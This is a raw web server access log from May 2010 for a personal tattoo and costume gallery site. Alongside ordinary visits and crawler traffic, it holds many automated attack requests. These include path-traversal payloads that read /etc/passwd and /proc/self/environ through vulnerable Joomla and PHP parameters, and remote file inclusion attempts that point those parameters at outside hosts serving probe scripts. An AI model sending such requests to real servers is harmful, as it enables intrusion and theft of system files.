109.54.25.5 - - [28/May/2010:09:38:37 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:38:37 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
216.97.225.115 - - [28/May/2010:09:38:38 -0500] "GET /logs/index1.php?choix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.814"
216.97.225.115 - - [28/May/2010:09:38:38 -0500] "GET /index1.php?choix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
217.27.240.120 - - [28/May/2010:09:38:43 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
217.27.240.120 - - [28/May/2010:09:38:43 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
94.23.18.102 - - [28/May/2010:09:40:06 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
216.127.70.140 - - [28/May/2010:09:41:47 -0500] "GET /logs/access_log.1223683200//poll/poll_ssi.php?include_path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:09:41:48 -0500] "GET /logs/access_log.1223683200//poll/poll_ssi.php?include_path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
67.195.112.180 - - [28/May/2010:09:42:22 -0500] "GET /logs/access_log.1219622400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.97.225.115 - - [28/May/2010:09:42:25 -0500] "GET /logs/access_log.1273363200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.814"
216.97.225.115 - - [28/May/2010:09:42:25 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
216.97.225.115 - - [28/May/2010:09:42:25 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.814"
204.152.200.50 - - [28/May/2010:09:43:21 -0500] "GET /logs/index1.php?choix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:09:43:22 -0500] "GET /index1.php?choix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.135.61.13 - - [28/May/2010:09:44:56 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.boomong.com//bbs/data/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.135.61.13 - - [28/May/2010:09:44:56 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.boomong.com//bbs/data/idxx.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.135.61.13 - - [28/May/2010:09:44:56 -0500] "GET /logs/access_log.1262563200/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.boomong.com//bbs/data/idxx.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.135.61.13 - - [28/May/2010:09:45:37 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.boomong.com//bbs/data/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.135.61.13 - - [28/May/2010:09:45:37 -0500] "GET /logs/access_log.1262563200/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.boomong.com//bbs/data/idxx.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.135.61.13 - - [28/May/2010:09:45:37 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.boomong.com//bbs/data/idxx.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
203.174.82.170 - - [28/May/2010:09:47:31 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
203.174.82.170 - - [28/May/2010:09:47:31 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.249.65.59 - - [28/May/2010:09:48:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.59 - - [28/May/2010:09:48:57 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.27.240.120 - - [28/May/2010:09:49:22 -0500] "GET /logs/access_log.1273363200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
217.27.240.120 - - [28/May/2010:09:49:22 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
217.27.240.120 - - [28/May/2010:09:49:22 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
24.144.81.135 - - [28/May/2010:09:51:42 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.com/url?sa=t&source=web&ct=res&cd=8&ved=0CDgQFjAH&url=http%3A%2F%2Ftomdolan.pconline.com%2Fcostume%2Findex1.htm&rct=j&q=english+kings+1500+-++1550&ei=YNj_S9GPHcaAlAfB5t39CQ&usg=AFQjCNEDOkhmsD_BW-Fj6g1_a4F3PicJ2A""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:51:43 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:51:46 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:45 -0500] "GET /costume/thmb6.htm HTTP/1.1" 200 3210 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume61%20copy.JPG HTTP/1.1" 200 18054 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume62%20copy.JPG HTTP/1.1" 200 16357 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume63%20copy.JPG HTTP/1.1" 200 17743 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume64%20copy.JPG HTTP/1.1" 200 16453 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume65%20copy.JPG HTTP/1.1" 200 18435 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume66%20copy.JPG HTTP/1.1" 200 17118 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume67%20copy.JPG HTTP/1.1" 200 17016 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume72%20copy.JPG HTTP/1.1" 200 17645 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume68%20copy.JPG HTTP/1.1" 200 17278 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume71%20copy.JPG HTTP/1.1" 200 15824 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume69%20copy.JPG HTTP/1.1" 200 16551 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
24.144.81.135 - - [28/May/2010:09:52:46 -0500] "GET /costume/costume70.JPG HTTP/1.1" 200 60587 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
87.250.255.243 - - [28/May/2010:09:53:29 -0500] "GET /logs/access_log.1250294400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.194.117 - - [28/May/2010:09:54:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.117 - - [28/May/2010:09:54:37 -0500] "GET /rachel%20study/rachel-17.jpg HTTP/1.1" 404 310 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
64.91.234.162 - - [28/May/2010:09:55:08 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:10 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:11 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:12 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:13 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:14 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:15 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:16 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:17 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:19 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:20 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:22 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:09:55:23 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
79.174.73.72 - - [28/May/2010:09:56:18 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-""libwww-perl/5.805"
79.174.73.72 - - [28/May/2010:09:56:19 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.805"
94.23.18.102 - - [28/May/2010:09:57:39 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.18.102 - - [28/May/2010:09:57:40 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.18.102 - - [28/May/2010:09:57:40 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
209.216.201.8 - - [28/May/2010:09:57:42 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
67.18.167.170 - - [28/May/2010:09:57:51 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
94.198.96.3 - - [28/May/2010:10:00:12 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.816"
67.195.112.180 - - [28/May/2010:10:01:26 -0500] "GET /logs/access_log.1274832000 HTTP/1.0" 200 738114 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.18.167.170 - - [28/May/2010:10:01:49 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
209.216.201.8 - - [28/May/2010:10:01:58 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
212.69.218.47 - - [28/May/2010:10:03:10 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 295 "-""libwww-perl/5.73"
212.69.218.47 - - [28/May/2010:10:03:10 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 300 "-""libwww-perl/5.73"
94.198.96.3 - - [28/May/2010:10:03:38 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.816"
121.190.102.21 - - [28/May/2010:10:03:45 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:03:45 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:03:45 -0500] "GET /logs/access_log.1271548800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
207.46.195.225 - - [28/May/2010:10:05:58 -0500] "GET /logs/access_log.1185148800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.190.102.21 - - [28/May/2010:10:08:31 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:08:31 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:08:31 -0500] "GET /logs/access_log.1271548800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
207.46.194.52 - - [28/May/2010:10:08:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.52 - - [28/May/2010:10:08:51 -0500] "GET /artwork/tmgblkpz1.jpg HTTP/1.1" 200 3807 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [28/May/2010:10:09:00 -0500] "GET /logs/?N=D HTTP/1.0" 200 7270 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.239 - - [28/May/2010:10:09:59 -0500] "GET /logs/access_log.1195776000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [28/May/2010:10:10:45 -0500] "GET /logs/access_log.1274659200 HTTP/1.0" 200 983818 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.64.202.205 - - [28/May/2010:10:11:12 -0500] "GET /fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 288 "-""Mozilla/5.0"
217.64.202.205 - - [28/May/2010:10:11:12 -0500] "GET /logs/access_log.1262563200/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
217.64.202.205 - - [28/May/2010:10:11:12 -0500] "GET /logs/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
217.64.202.205 - - [28/May/2010:10:11:14 -0500] "GET /fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 288 "-""Mozilla/5.0"
217.64.202.205 - - [28/May/2010:10:11:14 -0500] "GET /logs/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
217.64.202.205 - - [28/May/2010:10:11:14 -0500] "GET /logs/access_log.1262563200/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
81.208.34.38 - - [28/May/2010:10:11:17 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://snsecrets.com/css/id1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
81.208.34.38 - - [28/May/2010:10:11:17 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://snsecrets.com/css/id1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
81.208.34.38 - - [28/May/2010:10:11:20 -0500] "GET /logs/access_log.1271548800//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://snsecrets.com/css/id1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
217.64.202.205 - - [28/May/2010:10:11:20 -0500] "GET /fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 288 "-""Mozilla/5.0"
217.64.202.205 - - [28/May/2010:10:11:20 -0500] "GET /logs/access_log.1262563200/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
217.64.202.205 - - [28/May/2010:10:11:20 -0500] "GET /logs/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.208.34.38 - - [28/May/2010:10:11:36 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://snsecrets.com/css/id1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
81.208.34.38 - - [28/May/2010:10:11:36 -0500] "GET /logs/access_log.1272499200//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://snsecrets.com/css/id1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
81.208.34.38 - - [28/May/2010:10:11:36 -0500] "GET /logs/access_log.1272672000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://snsecrets.com/css/id1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
69.175.83.34 - - [28/May/2010:10:11:50 -0500] "GET /logs/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.175.83.34 - - [28/May/2010:10:11:50 -0500] "GET /logs/access_log.1262563200/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
69.175.83.34 - - [28/May/2010:10:11:50 -0500] "GET /fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 288 "-""Mozilla/5.0"
69.175.83.34 - - [28/May/2010:10:11:50 -0500] "GET /fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 288 "-""Mozilla/5.0"
69.175.83.34 - - [28/May/2010:10:11:50 -0500] "GET /logs/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.175.83.34 - - [28/May/2010:10:11:50 -0500] "GET /logs/access_log.1262563200/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
69.175.83.34 - - [28/May/2010:10:11:50 -0500] "GET /logs/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.175.83.34 - - [28/May/2010:10:11:50 -0500] "GET /fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 288 "-""Mozilla/5.0"
69.175.83.34 - - [28/May/2010:10:11:50 -0500] "GET /logs/access_log.1262563200/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:12:18 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:12:18 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:12:18 -0500] "GET /logs/access_log.1272240000/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:12:18 -0500] "GET /logs/access_log.1270598400/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
209.216.201.8 - - [28/May/2010:10:12:24 -0500] "GET /logs/access_log.1273017600/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.814"
209.216.201.8 - - [28/May/2010:10:12:24 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
209.216.201.8 - - [28/May/2010:10:12:24 -0500] "GET /logs/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
121.190.102.21 - - [28/May/2010:10:12:27 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:12:27 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:12:27 -0500] "GET /logs/access_log.1270598400/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:12:27 -0500] "GET /logs/access_log.1272240000/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:12:52 -0500] "GET /logs/access_log.1270598400/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
121.190.102.21 - - [28/May/2010:10:12:52 -0500] "GET /logs/access_log.1272240000/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
